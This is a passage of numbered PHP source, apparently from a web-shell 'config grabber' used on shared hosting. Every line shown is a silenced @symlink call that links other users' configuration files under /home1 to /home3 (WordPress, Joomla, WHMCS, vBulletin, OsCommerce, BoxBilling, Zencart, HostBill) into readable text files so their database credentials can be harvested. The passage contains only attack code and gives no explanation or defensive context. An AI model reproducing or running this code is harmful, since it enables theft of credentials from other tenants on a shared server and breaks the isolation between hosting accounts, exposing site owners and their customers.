  997. @symlink('/home1/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  998. @symlink('/home1/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  999. @symlink('/home1/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  1000. @symlink('/home1/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  1001. @symlink('/home1/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  1002. @symlink('/home1/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  1003. @symlink('/home1/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  1004. @symlink('/home1/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  1005. @symlink('/home1/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  1006. @symlink('/home1/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  1007. @symlink('/home1/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  1008. @symlink('/home1/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  1009. @symlink('/home1/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  1010. @symlink('/home1/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  1011. @symlink('/home1/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1012. @symlink('/home1/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  1013. @symlink('/home1/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  1014. @symlink('/home1/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  1015. @symlink('/home1/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  1016. @symlink('/home1/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  1017. @symlink('/home1/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  1018. @symlink('/home1/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  1019. @symlink('/home1/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  1020. @symlink('/home1/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1021.  
  1022. //Home2
  1023.  
  1024. @symlink('/home2/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  1025. @symlink('/home2/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  1026. @symlink('/home2/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  1027. @symlink('/home2/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  1028. @symlink('/home2/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  1029. @symlink('/home2/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  1030. @symlink('/home2/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  1031. @symlink('/home2/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  1032. @symlink('/home2/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  1033. @symlink('/home2/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  1034. @symlink('/home2/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  1035. @symlink('/home2/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  1036. @symlink('/home2/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  1037. @symlink('/home2/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  1038. @symlink('/home2/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  1039. @symlink('/home2/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  1040. @symlink('/home2/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  1041. @symlink('/home2/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  1042. @symlink('/home2/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  1043. @symlink('/home2/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  1044. @symlink('/home2/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  1045. @symlink('/home2/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  1046. @symlink('/home2/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  1047. @symlink('/home2/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  1048. @symlink('/home2/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  1049. @symlink('/home2/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  1050. @symlink('/home2/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  1051. @symlink('/home2/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  1052. @symlink('/home2/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  1053. @symlink('/home2/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  1054. @symlink('/home2/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  1055. @symlink('/home2/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  1056. @symlink('/home2/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  1057. @symlink('/home2/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  1058. @symlink('/home2/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  1059. @symlink('/home2/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  1060. @symlink('/home2/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  1061. @symlink('/home2/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  1062. @symlink('/home2/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  1063. @symlink('/home2/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  1064. @symlink('/home2/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  1065. @symlink('/home2/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  1066. @symlink('/home2/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  1067. @symlink('/home2/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  1068. @symlink('/home2/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  1069. @symlink('/home2/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  1070. @symlink('/home2/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  1071. @symlink('/home2/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  1072. @symlink('/home2/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  1073. @symlink('/home2/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1074. @symlink('/home2/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1075. @symlink('/home2/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  1076. @symlink('/home2/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  1077. @symlink('/home2/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  1078. @symlink('/home2/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  1079. @symlink('/home2/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  1080. @symlink('/home2/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  1081. @symlink('/home2/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  1082. @symlink('/home2/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  1083. @symlink('/home2/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  1084. @symlink('/home2/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  1085. @symlink('/home2/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  1086. @symlink('/home2/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  1087. @symlink('/home2/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  1088. @symlink('/home2/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  1089. @symlink('/home2/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  1090. @symlink('/home2/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  1091. @symlink('/home2/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  1092. @symlink('/home2/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  1093. @symlink('/home2/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  1094. @symlink('/home2/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  1095. @symlink('/home2/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  1096. @symlink('/home2/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  1097. @symlink('/home2/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  1098. @symlink('/home2/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  1099. @symlink('/home2/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  1100. @symlink('/home2/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  1101. @symlink('/home2/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  1102. @symlink('/home2/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  1103. @symlink('/home2/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  1104. @symlink('/home2/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  1105. @symlink('/home2/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  1106. @symlink('/home2/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  1107. @symlink('/home2/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  1108. @symlink('/home2/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  1109. @symlink('/home2/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  1110. @symlink('/home2/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  1111. @symlink('/home2/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  1112. @symlink('/home2/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  1113. @symlink('/home2/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  1114. @symlink('/home2/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  1115. @symlink('/home2/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  1116. @symlink('/home2/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  1117. @symlink('/home2/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  1118. @symlink('/home2/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  1119. @symlink('/home2/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  1120. @symlink('/home2/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  1121. @symlink('/home2/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  1122. @symlink('/home2/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  1123. @symlink('/home2/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1124. @symlink('/home2/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1125. @symlink('/home2/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1126. @symlink('/home2/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  1127. @symlink('/home2/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  1128. @symlink('/home2/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  1129. @symlink('/home2/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  1130. @symlink('/home2/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  1131. @symlink('/home2/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  1132. @symlink('/home2/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  1133. @symlink('/home2/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  1134. @symlink('/home2/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  1135. @symlink('/home2/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  1136. @symlink('/home2/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  1137. @symlink('/home2/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  1138. @symlink('/home2/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  1139. @symlink('/home2/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  1140. @symlink('/home2/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  1141. @symlink('/home2/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  1142. @symlink('/home2/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  1143. @symlink('/home2/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  1144. @symlink('/home2/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  1145. @symlink('/home2/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  1146. @symlink('/home2/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  1147. @symlink('/home2/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  1148. @symlink('/home2/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  1149. @symlink('/home2/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  1150. @symlink('/home2/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1151. @symlink('/home2/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1152. @symlink('/home2/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1153. @symlink('/home2/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  1154. @symlink('/home2/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  1155. @symlink('/home2/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  1156. @symlink('/home2/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  1157. @symlink('/home2/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  1158. @symlink('/home2/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  1159. @symlink('/home2/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  1160. @symlink('/home2/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  1161. @symlink('/home2/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  1162. @symlink('/home2/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  1163. @symlink('/home2/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  1164. @symlink('/home2/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  1165. @symlink('/home2/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  1166. @symlink('/home2/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  1167. @symlink('/home2/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  1168. @symlink('/home2/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  1169. @symlink('/home2/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  1170. @symlink('/home2/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  1171. @symlink('/home2/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  1172. @symlink('/home2/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  1173. @symlink('/home2/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  1174. @symlink('/home2/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  1175. @symlink('/home2/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  1176. @symlink('/home2/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  1177. @symlink('/home2/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  1178. @symlink('/home2/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  1179. @symlink('/home2/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  1180. @symlink('/home2/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  1181. @symlink('/home2/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  1182. @symlink('/home2/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  1183. @symlink('/home2/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  1184. @symlink('/home2/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  1185. @symlink('/home2/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  1186. @symlink('/home2/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  1187. @symlink('/home2/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  1188. @symlink('/home2/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  1189. @symlink('/home2/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  1190. @symlink('/home2/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  1191. @symlink('/home2/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  1192. @symlink('/home2/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  1193. @symlink('/home2/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  1194. @symlink('/home2/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1195. @symlink('/home2/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  1196. @symlink('/home2/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  1197. @symlink('/home2/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  1198. @symlink('/home2/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  1199. @symlink('/home2/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  1200. @symlink('/home2/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  1201. @symlink('/home2/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  1202. @symlink('/home2/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  1203. @symlink('/home2/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1204.  
  1205. //Home3
  1206.  
  1207. @symlink('/home3/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  1208. @symlink('/home3/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  1209. @symlink('/home3/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  1210. @symlink('/home3/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  1211. @symlink('/home3/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  1212. @symlink('/home3/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  1213. @symlink('/home3/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  1214. @symlink('/home3/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  1215. @symlink('/home3/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  1216. @symlink('/home3/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  1217. @symlink('/home3/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  1218. @symlink('/home3/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  1219. @symlink('/home3/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  1220. @symlink('/home3/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  1221. @symlink('/home3/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  1222. @symlink('/home3/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  1223. @symlink('/home3/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  1224. @symlink('/home3/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  1225. @symlink('/home3/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  1226. @symlink('/home3/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  1227. @symlink('/home3/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  1228. @symlink('/home3/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  1229. @symlink('/home3/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  1230. @symlink('/home3/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  1231. @symlink('/home3/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  1232. @symlink('/home3/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  1233. @symlink('/home3/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  1234. @symlink('/home3/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  1235. @symlink('/home3/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  1236. @symlink('/home3/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  1237. @symlink('/home3/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  1238. @symlink('/home3/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  1239. @symlink('/home3/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  1240. @symlink('/home3/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  1241. @symlink('/home3/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  1242. @symlink('/home3/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  1243. @symlink('/home3/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  1244. @symlink('/home3/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  1245. @symlink('/home3/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  1246. @symlink('/home3/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  1247. @symlink('/home3/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  1248. @symlink('/home3/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  1249. @symlink('/home3/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  1250. @symlink('/home3/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  1251. @symlink('/home3/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  1252. @symlink('/home3/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  1253. @symlink('/home3/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  1254. @symlink('/home3/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  1255. @symlink('/home3/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  1256. @symlink('/home3/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1257. @symlink('/home3/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1258. @symlink('/home3/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  1259. @symlink('/home3/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  1260. @symlink('/home3/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  1261. @symlink('/home3/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  1262. @symlink('/home3/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  1263. @symlink('/home3/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  1264. @symlink('/home3/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  1265. @symlink('/home3/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  1266. @symlink('/home3/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  1267. @symlink('/home3/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  1268. @symlink('/home3/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  1269. @symlink('/home3/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  1270. @symlink('/home3/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  1271. @symlink('/home3/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  1272. @symlink('/home3/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  1273. @symlink('/home3/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  1274. @symlink('/home3/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  1275. @symlink('/home3/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  1276. @symlink('/home3/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  1277. @symlink('/home3/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  1278. @symlink('/home3/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  1279. @symlink('/home3/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  1280. @symlink('/home3/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  1281. @symlink('/home3/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  1282. @symlink('/home3/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  1283. @symlink('/home3/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  1284. @symlink('/home3/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  1285. @symlink('/home3/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  1286. @symlink('/home3/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  1287. @symlink('/home3/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  1288. @symlink('/home3/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  1289. @symlink('/home3/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  1290. @symlink('/home3/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  1291. @symlink('/home3/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  1292. @symlink('/home3/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  1293. @symlink('/home3/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  1294. @symlink('/home3/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  1295. @symlink('/home3/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  1296. @symlink('/home3/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  1297. @symlink('/home3/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  1298. @symlink('/home3/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  1299. @symlink('/home3/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  1300. @symlink('/home3/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  1301. @symlink('/home3/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  1302. @symlink('/home3/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  1303. @symlink('/home3/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  1304. @symlink('/home3/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
